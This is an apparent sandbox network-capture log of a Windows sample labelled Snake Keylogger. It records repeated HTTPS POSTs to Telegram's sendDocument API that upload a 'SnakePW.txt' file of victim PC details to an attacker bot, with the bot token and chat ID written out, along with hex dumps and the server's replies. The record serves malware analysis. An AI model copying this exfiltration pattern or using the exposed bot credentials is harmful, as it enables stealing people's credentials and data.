                                                                    2022-06-26 07:33:58 UTC316OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 34 33 37 32 62 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575704372bc8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:59 UTC316INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:59 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:59 UTC316INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66958,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228839,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    188192.168.2.550056149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:59 UTC317OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570472c8bd
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:59 UTC317OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 34 37 32 63 38 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570472c8bdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:59 UTC318INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:59 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:59 UTC318INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66959,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228839,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    189192.168.2.550059149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:59 UTC319OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575704a99d5f
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:59 UTC319OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 34 61 39 39 64 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575704a99d5fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:59 UTC319INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:59 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:59 UTC320INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66960,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228839,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    19192.168.2.549787149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:46 UTC32OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d8ef6bb4
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:46 UTC32OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 38 65 66 36 62 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d8ef6bb4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:46 UTC32INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:46 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:46 UTC33INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66766,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228766,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    190192.168.2.550060149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:59 UTC320OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575704ec5f15
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:59 UTC321OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 34 65 63 35 66 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575704ec5f15Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:00 UTC321INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:00 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:00 UTC322INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66961,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228840,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    191192.168.2.550065149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:00 UTC322OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575705233631
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:00 UTC322OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 35 32 33 33 36 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575705233631Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:00 UTC323INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:00 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:00 UTC323INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66962,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228840,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    192192.168.2.550068149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:00 UTC324OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757055edd67
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:00 UTC324OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 35 35 65 64 64 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757055edd67Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:01 UTC325INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:01 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:01 UTC325INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66964,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228840,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    193192.168.2.550070149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:01 UTC325OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757059ccc9d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
